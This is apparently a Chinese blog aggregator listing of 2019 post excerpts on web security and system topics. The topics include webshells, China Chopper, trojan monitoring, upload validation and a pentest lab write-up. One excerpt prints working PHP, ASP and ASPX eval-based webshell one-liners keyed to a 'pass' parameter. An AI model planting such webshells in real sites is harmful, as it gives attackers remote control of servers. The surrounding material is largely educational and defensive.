一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来: 二、编码的替换的类型: 三、其他类型: 四、下载类型: 五、无关键函数类型: 六、补充知识点: SQL写一句话(MySQL): ...
分类:
数据库 时间:
2019-09-11 17:47:50
阅读次数:
180
说明 木马可能类似随机发送心跳包的操作,随机sleep。对这类情况写好了一个监听shell脚本,每隔一秒钟就记录下netstat状态。 代码 ...
分类:
Web程序 时间:
2019-09-10 01:06:48
阅读次数:
118
中国菜刀的由来: 说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了C++/J2ME/PHP/JSP/ASP.NET等等十数种计算机语言,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页 ...
分类:
其他好文 时间:
2019-08-31 21:34:03
阅读次数:
549
OSI参考模型 应用层 包括所有能产生网络流量的程序 表示层 用来判断传输之前是否进行加密或压缩处理(二进制、ASCII) 比如出现乱码情况,可能就是表示层的问题 会话层 一个浏览器窗口就是一个会话 能够 用netstat -n 来查看会话,查找木马 传输层 可靠传输、流量控制和不可靠传输 网络层 ...
分类:
其他好文 时间:
2019-08-21 23:08:01
阅读次数:
114
说几个我经常用的,免费的:1. Malware Traffic Analysis: http://www.malware-traffic-analysis.net/2018/index.html 这个网站每天更新,主要是欧美地区的新鲜流行木马样本,基本上当天更新的马都很新~2.Virus Bay: ...
分类:
Web程序 时间:
2019-08-20 12:17:58
阅读次数:
118
php <?php @eval($_post['pass']);?> asp <%eval request ("pass")%> aspx <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 防御 代码中过滤。 ...
分类:
其他好文 时间:
2019-08-17 17:48:05
阅读次数:
112
方法一:用image对象判断是否为图片 方法二,判断文件头 据说方法二针对常规修改的木马有效,也就是直接修改扩展名的,比如把.asp改成.jpg这种。但是对于那种用工具生成的jpg木马没有效果。推荐大家用第一种好了。 ...
分类:
Web程序 时间:
2019-08-13 15:38:51
阅读次数:
116
Web for pentester_writeup之File Upload篇 File Upload(文件上传) Example 1 直接上传一句话木马,使用蚁剑连接 成功连接,获取网站根目录 Example 2 可以看到上传文件做了相关限制,不允许上传PHP文件, 修改后缀名为linux不识别的x ...
分类:
Web程序 时间:
2019-08-08 19:16:58
阅读次数:
144
修复MBR扇区故障: 故障原因: a.病毒、木马等 b.不正确的分区操作、磁盘读写误操作 故障现象: a.找不到引导程序、启动中断 b.无法加载操作系统、开机后黑屏 解决思路: a.提前准备好备份文件 b.以安装光盘引导进入急救模式 c.从备份文件恢复 步骤: fdisk –l 检测并确认新磁盘 c ...
分类:
其他好文 时间:
2019-08-07 20:51:56
阅读次数:
123
